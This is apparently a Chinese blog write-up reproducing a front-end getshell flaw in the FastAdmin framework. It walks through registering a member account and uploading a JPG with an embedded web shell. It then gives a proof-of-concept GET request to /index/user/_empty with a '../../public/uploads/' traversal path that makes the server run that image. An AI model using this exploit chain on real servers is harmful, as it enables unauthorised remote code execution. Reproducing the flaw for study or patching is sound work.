Fastadmin前台Getshell漏洞复现

一、简介

FastAdmin是一款基于ThinkPHP5+Bootstrap开发的极速后台开发框架。FastAdmin基于Apache2.0开源协议发布,目前被广泛应用于各大行业应用后台管理。

二、漏洞复现

注:在Linux下,通过这种方法会失效,因为在 /public 路径下不存在 user 目录

1、登录前台会员中心,注册一个账户

Fastadmin前台Getshell漏洞复现

2、使用注册的账户登录,点击会员中心"-》"个人资料"处,上传一个jpg图片马

Fastadmin前台Getshell漏洞复现

Fastadmin前台Getshell漏洞复现

Fastadmin前台Getshell漏洞复现

3、构造POC,GET /index/user/_empty?name=../../public/uploads/路径.jpg,访问http://xx.xx.xx.xx/index.php/index/user/_empty?name=../../public/uploads/20200924/500309dcf5c48dd851a218caa0f65566.jpg

Fastadmin前台Getshell漏洞复现

相关文章:

  • 2022-12-23
  • 2022-03-07
  • 2021-12-18
  • 2021-09-29
  • 2021-04-23
猜你喜欢
  • 2021-12-10
  • 2022-12-23
  • 2021-08-19
  • 2022-12-23
  • 2022-12-23
  • 2021-11-18
  • 2022-12-23
相关资源
相似解决方案